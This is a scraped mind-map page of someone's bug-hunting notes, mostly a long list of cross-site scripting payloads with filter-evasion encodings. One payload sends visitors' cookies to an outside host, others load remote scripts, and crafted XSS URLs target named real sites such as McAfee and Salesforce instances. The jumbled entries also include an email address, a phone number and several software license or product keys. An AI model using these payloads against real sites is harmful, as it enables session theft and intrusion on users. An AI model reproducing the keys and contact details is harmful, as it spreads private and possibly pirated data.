Get Started. It's Free
or sign up with your email address
[email protected] by Mind Map: rt.1011@outlook.com

1. 32

2. <img src="/" =_=" title="onerror='prompt(1)'">

3. %253cscript%253ealert(/xss-by-shawar/)%253c/script%253e

4. imp :

5. <form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>

6. DOM : --><iframe%0A%0Dsrc%3Dhttp%3A%2F%2Faxmerc28.5gbfree.com%2Findex.html><%2Fiframe>

7. http://shawarkhan.byethost7.com/?input=--%3E%3Ciframe%0A%0Dsrc%3Dhttp%3A%2F%2Faxmerc28.5gbfree.com%2Findex.html%3E%3C%2Fiframe%3E

8. <a href="//%0aalert(/@irsdl/);//">Possible XSS - works in Chrome</a>

9. <!--<img src="--><img src=x onerror=alert(123)//">

10. *���>]]>%>?></object></script></title></textarea></noscript></style></xmp>���-/"/-alert(1)//><img src=1 onerror=alert(1)>���

11. *���>]]>%>?></object></script></title></textarea></noscript></style></xmp>���-/"/-alert(1)//><img src=1 onerror=alert(1)>���

12. callback=<if

13. -%22%3E%3Cscript%3Ealert%28document.cookie%29%3C

14. '"--><script>alert(/Xss2ro07 aKa Side3ffects)</script>

15. <script>location.href="https://testingxssrj.000webhostapp.com/cookiefile.php?cookie=document.cookie<script>"

15.1. '<svg onload="alert('xx')">'

16. <script language="JaVaScript">

17. for dom : javascript:alert%281%29

17.1. javascript:prompt(document.domain);

18. <body onload=alert("XSS")>

19. ');alert('XSS

20. ssltest

21. A3-K7QCDX-F544N9-QYLM3-S4CBC-4DSZP-YH63X

22. http://www.<script>alert(1)</script .com

23. 2) <svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'

24. Account Lockout Hackerone

25. 5) <img/src=`%00` onerror=this.onerror=confirm(1)

26. 7) <img src=`%00`&NewLine; onerror=alert(1)&NewLine;

27. 9) <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?

28. 11) <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/

29. 13) <iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">

30. 15) <svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script

31. 17) <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">

32. 19) <form><a href="javascript:\u0061lert&#x28;1&#x29;">X sssssssssssssssss

33. 21) <img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>

34. 23) <a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a

35. 25) <a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a

36. 27) <style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;

37. 29) </style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-(

38. 31) <form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'> ss

39. 33) <iframe srcdoc='<body onload=prompt&lpar;1&rpar;>'>

40. 35) <script ~~~>alert(0%0)</script ~~~> abh

41. 37) <///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN

42. 39) &#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'

43. 41) <marquee onstart='javascript:alert&#x28;1&#x29;'>^__^

44. 43) <iframe/%00/ src=javaSCRIPT&colon;alert(1)

45. 45) /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>

46. 47) </font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>

47. 49) </plaintext\></|\><plaintext/onmouseover=prompt(1)

48. 51) <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button> ss

49. 53) <iframe style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">

50. 55) <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">

51. 57) <var onmouseover="prompt(1)">On Mouse Over</var>

52. 59) <img src="/" =_=" title="onerror='prompt(1)'">

53. 61) <script src="data:text/javascript,alert(1)"></script>

54. 63) <iframe/onreadystatechange=alert(1)

55. 65) <input value=<><iframe/src=javascript:confirm(1)

56. 67) http://www.<script>alert(1)</script .com

57. 69) <svg><script ?>alert(1)

58. 71) <img src=`xx:xx`onerror=alert(1)>

59. 73) <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>

60. 75) <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>

61. 77) <a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a

62. 79) <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+

63. 81) <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script

64. 83) <script>+-+-1-+-+alert(1)</script>

65. 85) <script itworksinallbrowsers>/*<script* */alert(1)</script

66. 87) <svg><script>//&NewLine;confirm(1);</script </svg>

67. 89) ss<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe

68. 91) <div/onmouseover='alert(1)'> style="x:">

69. https://www.google.com.pk/webhp?sourceid=chrome-instant&ion=1&espv=2&ie=UTF-8#q=metasploit+tp+link

70. 93) <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>

71. 95) "><img src=x onerror=window.open('https://www.google.com/');>

72. 97) ss<math><a xlink:href="//jsfiddle.net/t846h/">click

73. 99) <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>ss

74. 100) <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>

75. 0300 7014685

76. %3E%3Cimg+src%3Dx+onerror%3Dprompt(1)%3B%3E

77. HTTP Cashe Poisoning issue

78. Detecting Xss with advance fuzzer

79. ]Detecting and Exploiting XSS with Xenotix XSS Exploit

80. Discovering XSS Vulnerabilities with Burp Intruder

81. check it soon

82. https://<your_instance>.my.salesforce.com/setup/ui/replacePickList.jsp?msg=This%20is%20dom%20based%20XSS+%3Cimg%20src=M%20onerror=prompt%281%29;%3E&retURL=%2Fsetup%2Fui%2Fpicklist_masterdetail.jsp%3Ftid%3D03j%26pt%3D45%26retURL%3D%252Fui%252Fsetup%252FSetup%253Fsetupid%253DCase%26setupid%3DCaseContactRoles&tableName=CaseContactRole&id=45&setupid=CaseContactRoles

83. 1) <iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00>

84. Build > Activities me Task field done

85. Product Key: D275-7NPG-2YPB-PFBR

86. <marquee onstart='javascript:alert&#x28;"note"&#x29;'>^__^

87. <img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>

88. http://shawarkhan.byethost7.com/?input=--%3E%3Ciframe%0A%0Dsrc%3Dhttp%3A%2F%2Faxmerc28.5gbfree.com%2Findex.html%3E%3C%2Fiframe%3E

89. <base href="javascript:\">

90. <IMG """><SCRIPT>alert("XSS")</SCRIPT>">s

91. *���>]]>%>?></object></script></title></textarea></noscript></style></xmp>���-/"/-alert(1)//><img src=1 onerror=alert(1)>���

92. *���>]]>%>?></object></script></title></textarea></noscript></style></xmp>���-/"/-alert(1)//><img src=1 onerror=alert(1)>���

93. '"--></style></script><script>alert("XSSed by Cyb3R_Shubh4M")

94. rame src='http://xssed.com'

95. /script%3E-

96. http://go.mcafee.com/activation.cfm?firewall_id=%22%20style=%22background-image:url%28%27http://i.imgur.com/oHp8A.gif%27%29%22%20onfocus=%22document.write%28String.fromCharCode%2860%29%2B%27iframe%20src=http://xssed.com%20height=100%25%20width=100%25%3E%27%2BString.fromCharCode%2860%29%2B%27/iframe%3E%27%2BString.fromCharCode%2860%29%2B%27script%3Ealert%28/XSS%20/%29%27%2BString.fromCharCode%2860%29%2B%27/script%3E%27%29%22%20foo=%22bar

97. '<img src="c" onload="alert(1)">'

98. fixEscape

99. https://www.collective2.com/cgi-perl/verify.mpl?pid=102085904&k=30124476804813

100. %27|alert%28%27XSS%27%29|%27

101. all vulnerabilities videos : https://www.youtube.com/watch?v=d1D7twRO5Ys

102. http://ssl-checker.online-domain-tools.com/

103. javascript:alert(document.domain)

103.1. "><script>alert(1);</script>#"><img src=x onerror=prompt(1);>

104. <var onmouseover="prompt(1)">On Mouse Over</var>

105. 3) <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"

106. 4) <sVg><scRipt %00>alert&lpar;1&rpar; {Opera}

107. 6) <form><isindex formaction="javascript&colon;confirm(1)"

108. 8) <script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>

109. 10) <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">

110. 12) &#34;&#62;<h1/onmouseover='\u0061lert(1)'>%00

111. 14) <meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>

112. 16) <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}

113. 18) <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>

114. 20) </script><img/*%00/src="worksinchrome&colon;prompt&#x28;1&#x29;"/%00*/onerror='eval(src)'>

115. 22) <form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>

116. 24) http://www.google<script .com>alert(document.location)</script

117. 26) <img/src=@&#32;&#13; onerror = prompt('&#49;') sss

118. 28) <script ^__^>alert(String.fromCharCode(49))</script ^__^

119. 30) &#00;</form><input type&#61;"date" onfocus="alert(1)"> sssssssssssss

120. 32) <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/

121. 34) <a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>

122. 36) <style/onload=<!--&#09;>&#10;alert&#10;&lpar;1&rpar;>

123. 38) <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)

124. 40) &#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}

125. 42) <div/style="width:expression(confirm(1))">X</div> {IE7}

126. 44) //<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//

127. 46) //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\

128. 48) <a/href="javascript:&#13; javascript:prompt(1)"><input type="X">

129. 50) </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera}

130. 52) <div onmouseover='alert&lpar;1&rpar;'>DIV</div>

131. 54) <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a> ssss

132. 56) <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">

133. 58) <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a> sss

134. 60) <%<!--'%><script>alert(1);</script -->

135. 62) <iframe/src \/\/onload = prompt(1)

136. 64) <svg/onload=alert(1)

137. 66) <input type="text" value=`` <div/onmouseover='alert(1)'>X</div>

138. 68) <iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>

139. 70) <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>

140. 72)

141. 74) ss <math><a xlink:href="//jsfiddle.net/t846h/">click

142. 76) <svg contentScriptType=text/vbs><script>MsgBox+1

143. 78) <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>

144. 80) <script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F

145. 82) <object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>

146. 84) <body/onload=<!-->&#10alert(1)>

147. 86) <img src ?itworksonchrome?\/onerror = alert(1)

148. 88) <svg><script onlypossibleinopera:-)> alert(1)

149. 90) <script x> alert(1) </script 1=2

150. 92) <--`<img/src=` onerror=alert(1)> --!>

151. Your License Key: 7SCQ-P3LE-F6RE-DYYC

152. 94) <div style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>ss

153. 96) ss<form><button formaction=javascript&colon;alert(1)>CLICKME

154. 98) ss<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>

155. ss

156. https://www.linkedin.com/pulse/20140812222156-79939846-xss-vectors-you-may-need-as-a-pen-tester

157. New

158. http://www.smeegesec.com/2012/06/collection-of-cross-site-scripting-xss.html

159. Email Change Request Dosent Expir After Password Change

160. www.youtube.com/watch?v=R8AgEWPFJ1g

161. https://www.exploit-db.com/docs/21223.pd

162. http://bughunting.guide/discovering-xss-vulnerabilities-with-burp-intruder/

163. https://fdhdhdfhdh-dev-ed.my.salesforce.com/ui/support/servicedesk/ServiceDeskHotkeyEditor/e?retURL=%2Fui%2Fsupport%2Fservicedesk%2FServiceDeskHotkeyEditor%2Fd%3Ftsid%3D02u28000000LOiq&tsid=02u28000000LOiq#